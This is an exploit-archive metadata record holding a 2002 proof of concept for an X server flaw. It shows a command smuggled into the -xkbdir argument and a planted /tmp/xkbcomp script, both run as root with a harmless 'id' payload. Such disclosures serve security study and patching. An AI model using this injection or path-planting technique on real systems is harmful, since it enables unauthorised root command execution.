{"id": "PACKETSTORM:29486", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "calderax.txt", "description": "", "published": "2002-08-29T00:00:00", "modified": "2002-08-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/29486/calderax.txt.html", "reporter": "Pavel Kankovsky", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:22:24", "viewCount": 12, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "_state": {"dependencies": 1678911500, "score": 1683818601, "epss": 1678921929}, "_internal": {"score_hash": "88721e626976da3f2aeebc5a719c68ce"}, "sourceHref": "https://packetstormsecurity.com/files/download/29486/calderax.txt", "sourceData": "`The following proof of concepts were provided by Pavel Kankovsky: \n$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;' \n[exit X server] \n$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!' \n \n$ cat > /tmp/xkbcomp \n#!/bin/sh \nid > /tmp/I_WAS_HERE \n[ctrl+d] \n$ chmod a+x /tmp/xkbcomp \n$ Xserver -xkbdir /tmp \n[X server executes /tmp/xkbcomp] \n \n`\n"}
{}